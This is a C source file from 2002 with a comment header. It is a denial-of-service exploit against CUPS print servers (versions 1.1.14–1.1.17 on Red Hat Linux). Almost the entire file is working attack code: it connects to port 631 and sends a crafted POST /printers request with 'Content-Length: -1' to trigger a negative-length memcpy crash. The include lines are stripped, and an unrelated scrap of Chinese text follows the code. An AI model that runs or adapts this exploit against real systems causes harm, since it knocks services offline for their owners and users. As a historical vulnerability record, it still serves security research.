/* --------------------------------------------------------------------------- Web: http://qb0x.net Author: Gabriel A. Maggiotti Date: December 28, 2002 E-mail: gmaggiot@ciudad.com.ar --------------------------------------------------------------------------- Summary ------- This code produces a denial of service (DoS), because off negative length in memcpy() calls. This issue is similar to the Apache HTTP Server chunking bug that is exploitable on OpenBSD, FreeBSD, and NetBSD due to their implementations of memcpy(). Platforms [1], [2] and [3] are all susceptible to this vulnerability. The following test platforms were used: [1] - Red Hat Linux 7.0 running CUPS-1.1.14-5 (RPM) [2] - Red Hat Linux 7.3 running CUPS-1.1.14-15 (RPM) [3] - Red Hat Linux 7.3 running CUPS-1.1.17 (Source Install) */ #include #include #include #include #include #include #include #include #include #include #include #include #define PORT 631 #define MAX 1000 char *str_replace(char *rep, char *orig, char *string) { int len=strlen(orig); char buf[500]=""; char *pt=strstr(string,orig); strncpy(buf,rep, sizeof(buf)); strncat(buf,pt+strlen(orig), sizeof(buf)); strcpy(pt,buf); return string; } int main(int argc,char *argv[MAX]) { int sockfd; int numbytes; int port; char *ptr; char POST_REQUEST[MAX] = "POST /printers HTTP/1.1\n" "Host: ##host\n" "Authorization: Basic AAA\n" "Content-Length: -1\n\n\n"; struct hostent *he; struct sockaddr_in their_addr; if(argc!=2) { fprintf(stderr,"usage:%s \n",argv[0]); exit(1); } ptr=str_replace(argv[1],"##host",POST_REQUEST); printf("%s\n",ptr); if((he=gethostbyname(argv[1]))==NULL) { perror("gethostbyname"); exit(1); } if( (sockfd=socket(AF_INET,SOCK_STREAM,0)) == -1) { perror("socket"); exit(1); } their_addr.sin_family=AF_INET; their_addr.sin_port=htons(PORT); their_addr.sin_addr=*((struct in_addr*)he->h_addr); bzero(&(their_addr.sin_zero),8); if( connect(sockfd,(struct sockaddr*)&their_addr,\ sizeof(struct sockaddr))==-1) { perror("connect"); exit(1); } if( send(sockfd,ptr,strlen(POST_REQUEST),0) ==-1) { perror("send"); exit(0); } close(sockfd); return 0; } /* --------------------------------------------------------------------------- research-list@qb0x.net is dedicated to interactively researching vulnerab- ilities, report potential or undeveloped holes in any kind of computer system. To subscribe to research-list@qb0x.ne t send a blank email to research-list-subscribe@qb0x.net. More help available sending an email to research-list-help@qb0x.net. Note: the list doesn't allow html, it will be stripped from messages. --------------------------------------------------------------------------- */

亚洲欧美在线